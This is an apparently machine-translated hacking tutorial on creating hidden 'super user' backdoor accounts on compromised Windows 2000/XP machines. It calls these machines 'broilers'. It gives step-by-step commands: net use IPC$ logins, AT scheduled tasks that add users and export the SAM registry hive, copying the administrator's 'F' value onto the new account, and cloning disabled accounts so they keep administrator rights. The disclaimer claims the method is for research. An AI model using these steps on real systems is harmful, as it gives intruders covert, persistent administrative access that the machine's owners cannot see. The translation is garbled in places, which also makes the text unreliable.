Source: http://wmjie.51.net/swords/, how to establish a hidden super user graphics interface on the graphical interface to apply to the broiler of the local or 3389 terminal service. The author I mentioned above is very good, but it is more complicated, and the PSU.exe (procedure to run as a system user), if you want to upload PSU.exe on the broiler. I said this method will not have to use the PSU.exe. Because Windows 2000 has two registry editors: regedit.exe and regedt32.exe. Regedit.exe and RegedT32.exe in XP are actually a program that modifies the "permission" in right-click "Permissions" when the key value is modified. I think everyone is familiar with regedit.exe, but it is not possible to set permissions to the registry, and the greatest advantage of RegedT32.exe is to set permissions to the registry. NT / 2000 / XP account information is under the hkey_local_machine / sam / sam key of the registry, but other users have no right to view the information inside, so I first use regedt32.exe to the SAM button. I am set to "Full Control" permissions. This allows the information in the SAM key to read and write. Specific steps are as follows: 1. Suppose we are on the broiler of the open terminal with superuser administrator, first create an account in the command line or account manager: Hacker $, here I set up this in the command line Account NET User Hacker $ 1234 / Add 2, enter: regedt32.exe and enter the regedt32.exe in the start / run. As shown in Figure: T001 3, click "Permissions" will pop up the following window: T002 Add to add the account when I log in to the security bar, here I log in as an administrator, so I will join the Administrator, and set it Permissions are "complete control". Here you need to explain: It is best to add the group where your logged in account or account is, do you want to modify the original account or group, otherwise a series of unnecessary issues will be brought. Waiting for hidden super users to build, come here to delete the account you add. 4, click "Start" → "Run" and enter "regedit.exe" Enter, start the registry editor regedit.exe. Open button: hkey_local_maichine / sam / sam / domains / account / user / names / harnet $ "is shown in Figure: T003 5, export item Hacker $, 00000409,000001f4 to Hacker.Reg, 409.REG, 1F4.REG, with Notes In this respect, the exported file is edited, copy the value of the key "f" in the item 000001f4 corresponding to the super user, and override the value of "f" under the item 00000409 corresponding to the HACKER $, and then 00000409 Hacker.reg merges. As Figure T004 edited HACKER.REG as shown in Figure: 6 Press F5 to refresh in the window, then play the file - Import the registry file to modify the HACKER.REG to import the registry 8. At this point, hidden superuser Hacker $ is already built, then close Regedit.exe. Replace the HKEY_LOCAL_MACHINE / SAM / SAM key in the regedt32.exe window (as long as the added account administrator) is deleted).
9. Note: After hidden superuser is built, the account manager does not see the Hacker $ user, you can't see the "net user" command in the command line, but after the superuser is built, you can't change your password. If you use the NET user command to change the password of Hacker $, then this hidden superuser will be seen in the Account Manager, and cannot be deleted. Second, how to remotely create hidden superusers in the command line will use AT commands because the planned task generated by AT is to run as system, so it is not used to use the PSU.exe program. In order to be able to use the AT command, the broiler must open the SCHEDULE service. If it is not turned on, the tool NetSvc.exe or sc.exe in the stream of light can be used remotely. Of course, the method can also be able to start the Schedule service. For command line, you can use a variety of connection methods, such as connecting the MSSQL's 1433 port with SQLEXEC, you can also use Telnet to get a cmdshell, and there is permission to run the AT command. 1. First find a broiler, as for how to come to this is not what I said here. Here first, it is assumed to find a super user for the applistrator, the password is 12345678 broiler, and now we start to remotely establish a hidden super user on the command line. (The host in the example is a host in my local area network. I change its IP address to 13.50.97.238, do not sit on the Internet to avoid harassing the normal IP address.) 2, first establish a connection with broilers Command is: NET use /13.50.97.238/ipc $ "12345678" / user: "Administrator 3, use the AT command to create a user on broiler (if the AT service is not started, you can use Xiao's Netsvc.exe or SC.exe Come remote start): AT / 13.50.97.238 12:51 C: /Winnt/System32/NET.EXE User Hacker $ 1234 / Add to build this add-on user name, because there is a set, the command line With NET USER, this user will not be displayed, but can see this user in Account Manager. 4, export hkey_local_machine / sam / sam / domains / account / users with an AT command: AT / 13.50.97.238 12: 55 C: /Winnt/Regedit.exe / e Hacker.reg HKEY_LOCAL_MACHINE / SAM / SAM / DOMAINS / Account / Users / / / 是 是 参 是 参,, in HKEY_LOCAL_MACHINE / SAM / SAM / DOMAINS / ACCOUNT / USERS / this button Be sure to end. If necessary, use quotation marks "C: /Winnt/Regedit.exe / e Hacker.reg HKEY_LOCAL_MACHINE / SAM / SAM / DOMAINS / ACCOUNT / Users /". 5, put the broiler Hacker.REG Download to this machine to open with Notepad to edit commands to: COPY /13.50.97.238/admin (/13.50.97.238/admin) The Method of Method has been introduced in the graphics world, here It is not introduced.
6, then copy the editorial Hacker.reg to copy the broiler on C: /Hacker.REG / 13.50.97.238/Admin / 13.50.97.238/admin $/system32/Hacker1.REG The above is as follows: 7, view broilers Time: NET TIME / 13.50 .97.238 Then use the AT command to delete the user Hacker $: AT / 13.50.97.238 13:40 NET User Hacker $ / DEL 8 NET use /13.50.97.238/IPC $ "1234" / user: "HACKER $" uses account HACKER $ with broiler, and cannot be connected to the description. 11, then verify that the user HACKER $ has read, write, deleted permissions, if you don't worry, you can also verify that you can build other accounts. 12. Through 1, 2, 3 in the drawings, it is possible to determine the user's HACKER $ with superuser privilege, because I started using the AT command to build it is an ordinary user, but now there is remote read, write, deleted permissions. Third, if the broiler does not open 3389 terminal service, and I don't want to use the command line, what should I do? In this case, you can also use the interface to establish a hidden super user with broilers. Because regedit.exe, RegedT32.exe has the function of connecting to the network registry, you can use regedt32.exe to set permissions for the registry key of the remote host, with regedit.exe to edit the remote registry. The account manager also has a function of another computer, you can use the Account Manager to create and delete an account for the remote host. Specific step gathering is similar to the above, I don't say much, only its speed is unbearable. But there are two premises here: 1, first use the NET USE / USER: "Super User Name" to establish a connection with the remote host to use the regedit.exe regedt32.exe and account manager Connect with the remote host. 2, the remote host must turn on the remote registry service (if not open, you can also open it remotely because you have a superuser password). 4. Establish hidden superusers with disabled accounts: We can use users from broiler to establish hidden hypercar. The method is as follows: 1. If you want to see what users are carefully prohibited, in general, some administrators usually disable guests for security, of course, if they are disabled. Under the graphical interface, it is very easy, as long as you can see a red cross on the disabled account; on the command line, I haven't thought of good ways, I can only use commands in the command line. : "NET User User Name" One one is to see if the user is disabled. 2. Here, we assume that the user Hacker is disabled by the administrator. First, I first clone the program Ca.exe first with Xiao Yan, clone the disabled user Hacker into a superuser (after cloning, the user's Hacker is automatically activated): ca.exe / broiler ip Administrator Super User Password Hacher Hacher Password. 3. If you now have a cmdshell, if you use Telnet service or SQLEXEC to connect the shell of MSSQL's default port 1433, you can use the shell, then you only enter the command: Net user Hacker / Active: NO This user Hacker is disabled (at least surface This is the case), of course, you can also replace the user Hacher to other disabled users.
4. At this time, if you look at the user in the Account Manager under the graphical interface, you will find that the user Hacker is disabled, but is it true? You connect the broiler with this disabled user to see if it can be connected? Use the command: Net user / broiler ip / ipc $ "HACKER Password" / user: "Hacker" to see. I can tell you that after many tests, it can be successful, and it is superuser. 5. What if there is no cmdshell? You can disable the user Hacker; command format: AT / broiler ip Time NET user HACKER / ACTIVE: NO 6. Principle: I can't say the specific and deep principle, I can only say from the simplest. You first disable the Super User Administrator in the Account Manager in the Graphical Interface, and will definitely pop up a dialogue and prohibit you from to continue to disable superuser administrator, and because in cloning, Hacker "f" in the registry The key is replaced by the Super User Administrator in the "F" key of the registry, so Hacker has the permissions of the superuser, but because Hacker "c" in the registry, "C" is still the original "C" button, Hacker is still Disabled, but its superuser permissions will not be disabled, so users who are disabled can also connect to broilers, and also have superuser permissions. I don't understand, everyone's right and so understand. V. Note: 1. After the hidden super user is established, you can't see this user in the account manager and the command line, but this user exists. 2. After the hidden super user is established, the password cannot be changed again, because once the password is changed, this hidden super user is exposed to the account manager and cannot be deleted. 3. When the test is tested in this unit, it is best to use the system's backup tool to back up the "system status" of this machine mainly the backup of the registry, because I have an account manager when I do a test. No user, there is no phenomenon in the group, but they exist. Fortunately, I have backed up, huh, huh. The SAM key is the most sensitive part of the system. 4. This method is tested on 2000 / XP and is not tested on NT. This method is for research purposes only, do not use the method for damage, using this method to cause serious consequences, by the user, the user is not responsible for all3389xp.bat is the full source code of the article, the function is: Open XP 3389, Establish a hidden account.